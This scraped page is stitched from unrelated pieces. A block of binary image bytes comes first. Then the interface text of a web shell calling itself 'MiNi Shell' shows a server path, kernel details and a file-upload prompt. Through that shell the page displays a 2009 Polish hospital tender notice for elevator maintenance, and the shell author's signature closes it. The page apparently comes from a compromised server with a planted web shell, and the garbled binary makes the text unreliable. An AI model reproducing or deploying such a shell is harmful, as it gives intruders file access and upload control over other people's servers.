JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090409/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090409/60431-N-2009.html

<p class="kh_header"><b>Szczecin: OS/ZP/35/09 usługa stałej całodobowej konserwacji i naprawy dźwigów na terenie obiektu SPSK Nr 1 PAM przy ul. Siedleckiej w Policach na okres 13 m-cy.</b><br>
<b>Numer ogłoszenia: 60431 - 2009; data zamieszczenia: 09.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Szpital Kliniczny Nr 1 PAM , ul. Unii Lubelskiej 1, 71-252 Szczecin, woj. zachodniopomorskie, tel. 091 4253008, faks 091 4253001.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spsk1.szn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OS/ZP/35/09 usługa stałej całodobowej konserwacji i naprawy dźwigów na terenie obiektu SPSK Nr 1 PAM przy ul. Siedleckiej w Policach na okres 13 m-cy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest stała całodobowa konserwacja i naprawa 
11 dźwigów osobowo - towarowych oraz świadczenie usługi Pogotowia Dźwigowego, na terenie obiektu SPSK NR 1 PAM  przy ul. Siedleckiej 2 w Policach, zgodnie z poniższym wykazem:

Przedmiot zamówienia	Parametry (techniczne)Q/ilość przystanków/ilość dzrwi	Ilość
1.	Dźwig towarowo-osobowy pralni szpitalnej, typ MGE - KDO Warszawa,nr fab. 52556/1992	Q 1000 kg / 2P / 2D	1 szt.
2.	Dźwig towarowo-osobowy pralni szpitalnej, typ MGE - KDO Warszawa,nr fab. 52557/1992	Q 1000 kg / 2P / 2D	1 szt.
3.	Dźwig towarowy na Bloku Operacyjnym,typ PRD - ZUD Bolęcin,nr fab 58160/1992	Q 250 kg / 2P / 2D	1 szt.
4.	Dźwig towarowy na Bloku Operacyjny, typ PRD - ZUD Bolęcin, nr fab. 58161/1992	Q 250 kg / 2P / 2D	1 szt.
5.	Dźwig towarowy na Bloku Operacyjnym, typ PRD - ZUD Bolęcin, nr fab. 58162/1993	Q 250 kg / 2P / 2D	1 szt.
6.	Dźwig towarowy kuchni szpitalnej,PRD - ZUD Bolęcin, nr fab. A-57059/1992	Q 250 kg / 2P / 3D	1 szt.
7.	Dźwig towarowy kuchni szpitalnej,typ PRD - ZUD Bolęcin,nr fab. A-57060/1992	Q 250 kg / 2P / 3D	1 szt.
8.	Dźwig towarowo-osobowy Pawilonu Łóżkowego, typ MGA - KDO Warszawa, nr fab. A-53221/1989	Q 1000 kg / 6P / 6D	1 szt.
9.	Dźwig towarowo-osobowy Pawilonu Łóżkowego,typ SGA - KDO Warszawa, nr fab. A-18123/1990	Q 1000 kg / 6P / 12D	1 szt.
10.	Dźwig towarowo-osobowy na Oddziale Patomorfologii,  typ SGA - KDO Warszawa, nr fab. A-22067/1991	Q 1000 kg / 2P / 2D	1 szt.
11.	Dźwig towarowo-osobowy na Oddziale Patomorfologi,typ SGA - KDO Warszawa, nr fab. A-22066/1991	Q 1000 kg / 2P / 2D	1 szt.





SPOSÓB REALIZACJI ZAMÓWIENIA 
1.	Konserwacja i naprawa dźwigów, obejmuje wszelkie niezbędne czynności konserwacyjne i naprawcze zabezpieczające całodobową sprawność wszystkich  dźwigów, a w szczególności:
a)	Utrzymanie w ruchu i konserwacja dźwigów zgodnie z  DTR producenta urządzeń, przepisami UDT.
b)	Zapewnienie całodobowego pogotowia dźwigowego z czasem dojazdu nie dłuższym niż 50 min od momentu zgłoszenia w przypadku awarii i w czasie nie dłuższym niż 30 min od momentu zgłoszenia w przypadku uwalniania osób.
c)	Naprawy bieżące urządzeń dźwigowych zgodnie z instrukcją DTR i decyzjami UDT.
d)	Zapewnienie odpłatnej dostawy części zamiennych niezbędnych do realizacji prac konserwacyjno - naprawczych po wcześniejszym uzgodnieniu kosztów z zamawiającym 
e)	Przygotowanie urządzeń do badań okresowych i doraźnych przeprowadzanych przez UDT oraz uczestniczenie w ww. badaniach.
f)	Wykonywanie wymaganych przepisami corocznych pomiarów i przeglądów dźwigów. 
g)	Pokrycie kosztów związanych z negatywnym wynikiem (z winy Wykonawcy) badań przeprowadzonych przez Inspektora Dozoru Technicznego
h)	Zapewnienie pomocniczych materiałów eksploatacyjnych do konserwacji i napraw dźwigów.
i)	Utrzymywanie czystości w szybach windowych i maszynowniach oraz utrzymanie estetyki kabin.
2.	Czas na usunięcie awarii dźwigów wynosi: 
-	do 4 godzin od momentu przyjęcia zgłoszenia w przypadku gdy nie występuje konieczność wymiany części
-	do 24 godzin od momentu przyjęcia zgłoszenia w przypadku konieczności wymiany części.
-	W przypadku gdy usunięcie awarii wymaga wymiany części,  których sprowadzenie uniemożliwiłoby wykonanie naprawy w terminie, o którym mowa w ust. 2 drugi tiret, Wykonawca przedstawi Zamawiającemu w terminie nie dłuższym niż 24 godziny od momentu przyjęcia zgłoszenia koszt części  do zaakceptowania. Czas naprawy nie może przekroczyć 7 dni licząc od momentu zaakceptowania przez Zamawiającego wysokości kosztów.
3.	Na wymienione części zamienne Wykonawca udzieli Zamawiającemu 
6 m-cy gwarancji.
3.	Każde zgłoszenie, odnotowane zostanie przez Zamawiającego w rejestrze zleceń złożonym w pomieszczeniu dyżurnego elektryka. Zamawiający odnotuje w rejestrze zleceń datę i godzinę zgłoszenia awarii jak również datę i godzinę przyjazdu Pogotowia.
4.	Zamawiający, zobowiązuje się do:
a.	potwierdzenia  wykonania usługi w Karcie Wykonania Konserwacji, najpóźniej następnego dnia roboczego po wykonaniu usługi 
b.	zapewnienia Wykonawcy swobodnego dostępu do urządzeń 
i maszynowni,
c.	niezwłocznego powiadamiania Wykonawcy o dostrzeżonych brakach w wyposażeniu lub nieprawidłowościach w pracy oraz przestojach,
d.	natychmiastowego unieruchomienia urządzeń w przypadku zagrożenia życia ludzkiego lub mienia oraz zabezpieczenia urządzeń przed dostępem osób postronnych. O powyższym fakcie Zamawiający powiadomi Wykonawcę.
e.	Pokrycia kosztów związanych z okresowymi badaniami przeprowadzanymi przez Inspektora Dozoru Technicznego


5. Terminy i warunki płatności oraz kary umowne określone są w Rozdziale IV SIWZ - projekt umowy.

6. Wszystkie działania Wykonawcy w zakresie przedmiotu zamówienia podlegać będą kontroli branżowego inspektora nadzoru Szpitala..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 50.53.14.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 13.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 4.1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, nie wykluczeni na
 	postawie art. 24 oraz spełniający warunki zawarte w art.22 ust. 1 Prawa	zamówień publicznych to jest:
1.	złożą oświadczenie na formularzu oświadczenia stanowiącym załącznik 
nr 2 do SIWZ.
2.	potwierdzą oświadczenie wymienione w pkt. 1 następującymi dokumentami,
złożonymi w formie oryginału lub kserokopii poświadczonej za zgodność 
z oryginałem przez osoby upoważnione do reprezentowania wykonawcy - zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie  rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane, z późniejszymi zmianami:
2.1. w celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podst. art. 24 ustawy PZP:
a) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie 
o wpisie do ewidencji działalności gospodarczej jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej  - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2.2 w celu potwierdzenia posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia:
a) wykaz wykonanych lub wykonywanych usług (min. 2) w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców. 

Za usługi odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, Zamawiający uzna usługi spełniające łącznie następujące kryteria: Prowadzenie stałej całodobowej konserwacji dźwigów osobowych i osobowo - towarowych wraz ze świadczeniem usług naprawy i pogotowia dźwigowego w ramach umowy zawartej na okres min. 1 roku.

Zamawiający wymaga aby ww. warunek potwierdzony był w wykazie wykonanych lub wykonywanych usług (pkt 2.2.a)) lub dokumentach potwierdzających należyte wykonanie usług (pkt 2.2.b) ) 
b) Do wykazu Wykonawca dołączy dokumenty potwierdzające, że wykazane usługi wykonane zostały należycie.

c) wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności 
Zamawiający wymaga, aby: 
-	pracownicy Wykonawcy (serwisanci-technicy konserwatorzy) posiadali uprawnienia w zakresie UDT i SEP E do 1 kV, 
-	Wykonawca posiadał uprawnienia w zakresie UDT i SEP D do 1 kV 
d) dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia  - kopie uprawnień UDT, SEP E do 1 kV i SEP D do 1 kV, 

2.3 w celu potwierdzenia, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia
a) polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności. 

2.4. zamawiający dopuszcza możliwości powierzenia przez Wykonawcę wykonania części zamówienia podwykonawcom. Wykonawca dołączy do oferty oświadczenie stanowiące załącznik nr 3 do SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> określone wyżej w opisie warunków udziału w postępowaniu.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.spsk1.szn.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> agatar@sci.pam.szczecin.pl
Dział Techniczny SPSK Nr 1 PAM.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.04.2009 godzina 10:00, miejsce: Sekretariat Dyrektora SPSK Nr 1 PAM.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com